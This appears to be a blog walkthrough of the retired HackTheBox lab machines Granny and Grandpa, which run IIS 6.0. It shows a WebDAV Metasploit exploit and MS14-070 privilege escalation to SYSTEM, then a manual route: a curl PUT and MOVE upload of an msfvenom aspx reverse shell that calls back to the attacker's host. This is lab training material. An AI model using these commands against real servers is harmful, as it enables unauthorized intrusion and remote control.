HTB Walkthrough: Granny Grandpa Metasploit (retired)

Granny and Grandpa are retired boxes on HTB and are part of TJ Null’s OCSP-like boxes.

Hostname: Granny, Grandpa| Difficulty Level: Easy | Operating System: Windows

You can exploit machines Granny and Grandpa in the exact same way. I will show steps for Granny.

NMAP Scan

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ nmap -sC -sV -oA Granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–21 15:15 EDT
Nmap scan report for 10.10.10.15
Host is up (0.026s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Server Date: Wed, 21 Apr 2021 19:29:52 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NOTE: Update kali + metasploit in case of issue ‘Exploit completed, but no session created’. Also, the machine keeps on dying (hence, the name), so be quick & that’s another reason for exploiting using Metasploit.

METASPLOIT

From nmap, we can see port 80 is running IIS 6.0.
┌──(kali㉿kali)-[~]
└─$ sudo msfdb run

msf6 > search IIS 6.0

There are 3 exploits and I tried all, exploit ‘windows/iis/iis_webdav_scstoragepathfromurl’ worked for me. Also, nmap scan hints on webdav usage.
msf6 > use 2
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST <Kali IP>
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
meterpreter > getuid
[-] 1055: Operation failed: Access is denied.

As seen from above, we have to migrate to another process. Let’s background our shell first and migrate to another process.

meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/windows/manage/migrate
msf6 post(windows/manage/migrate) > set SESSION 1
msf6 post(windows/manage/migrate) > exploit
msf6 post(windows/manage/migrate) > sessions 1
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

We have ‘Network Service’ privileges now. But we still do not have access to

meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.15 — Collecting local exploits for x86/windows…
[*] 10.10.10.15–35 exploit checks are being tried…
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 — exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 — exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 — exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 — exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 — exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 — exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

We have 4 exploits applicable and I selected MS14_070.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST <Kali IP>
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LPORT 9998
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell

You will get user and root flag.

MANUAL EXPLOITATION

Since, WedDav is used.

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ davtest -url http://10.10.10.15

Checking for test file execution
EXEC cfm FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_sRiowRgHTws/davtest_sRiowRgHTws.html
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_sRiowRgHTws/davtest_sRiowRgHTws.txt

From above, it is clear that we can upload html and txt file.
Let us try uploading (PUT) a file and execute to view contents. Then, rename (MOVE) the extension from html to aspx in order to execute it.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X PUT http://10.10.10.15/test.html -d @test.html

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/test.html
<html><body> Hey </body></html>

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X MOVE — header ‘DESTINATION:http://10.10.10.15/test.aspx’ ‘http://10.10.10.15/test.html'

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/test.aspx
<html><body> Hey </body></html>

EXPLOITATION

Let us replace test script with aspx reverse shell. Generate it using msfvenom
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=<Kali IP> LPORT=9876 -o reverse-shell.aspx

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ cp reverse-shell.aspx shell.txt

Make sure to include ‘ — data-binary’ flag if it is ASPX to text file conversion.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X PUT http://10.10.10.15/shell.txt — data-binary @shell.txt

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/shell.txt

┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl -X MOVE — header ‘DESTINATION:http://10.10.10.15/shell.aspx’ ‘http://10.10.10.15/shell.txt’

Open a netcat session on port 9876 before running below command.
┌──(kali㉿kali)-[~/labs/HTB/Granny]
└─$ curl http://10.10.10.15/shell.aspx

And you will get a reverse shell. Unfortunately, you have no access to user flag.

C:\Documents and Settings>whoami
whoami
nt authority\network service

Machine keeps on timing out. We will run windows exploit suggestor on systeminfo command output from reverse shell.

┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ ./windows-exploit-suggester.py — systeminfo ~/labs/HTB/Granny/systeminfo.txt -d 2021–04–20-mssb.xls

[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as ‘Windows 2003 SP2 32-bit’
[*]
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ — Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15–010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) — Critical
[*] https://www.exploit-db.com/exploits/39035/ — Microsoft Windows 8.1 — win32k Local Privilege Escalation (MS15–010), PoC
[*] https://www.exploit-db.com/exploits/37098/ — Microsoft Windows — Local Privilege Escalation (MS15–010), PoC
[*] https://www.exploit-db.com/exploits/39035/ — Microsoft Windows win32k Local Privilege Escalation (MS15–010), PoC
[*]
[E] MS14–070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) — Important
[*] http://www.exploit-db.com/exploits/35936/ — Microsoft Windows Server 2003 SP2 — Privilege Escalation, PoC
[*]
[E] MS14–068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) — Critical
[*] http://www.exploit-db.com/exploits/35474/ — Windows Kerberos — Elevation of Privilege (MS14–068), PoC
[*]
[M] MS14–064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) — Critical
[*] https://www.exploit-db.com/exploits/37800// — Microsoft Windows HTA (HTML Application) — Remote Code Execution (MS14–064), PoC
[*] http://www.exploit-db.com/exploits/35308/ — Internet Explorer OLE Pre-IE11 — Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14–064), PoC
[*] http://www.exploit-db.com/exploits/35229/ — Internet Explorer <= 11 — OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ — Internet Explorer < 11 — OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ — MS14–064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ — MS14–064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] http://www.exploit-db.com/exploits/34112/ — Microsoft Windows XP SP3 MQAC.sys — Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ — Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[*] http://www.exploit-db.com/exploits/35101/ — Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14–040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) — Important
[*] https://www.exploit-db.com/exploits/39525/ — Microsoft Windows 7 x64 — afd.sys Privilege Escalation (MS14–040), PoC
[*] https://www.exploit-db.com/exploits/39446/ — Microsoft Windows — afd.sys Dangling Pointer Privilege Escalation (MS14–040), PoC
[*]
[E] MS14–035: Cumulative Security Update for Internet Explorer (2969262) — Critical
[E] MS14–029: Security Update for Internet Explorer (2962482) — Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14–026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) — Important
[*] http://www.exploit-db.com/exploits/35280/, — .NET Remoting Services Remote Command Execution, PoC
[E] MS14–002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) — Important
[E] MS13–101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) — Important

[E] MS12–037: Cumulative Security Update for Internet Explorer (2699988) — Critical
[*] http://www.exploit-db.com/exploits/35273/ — Internet Explorer 8 — Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ — Internet Explorer 8 — Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12–037), PoC
[E] MS11–011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) — Important

Since, machine kept on timing out, I did not continue. Feel free to work on it.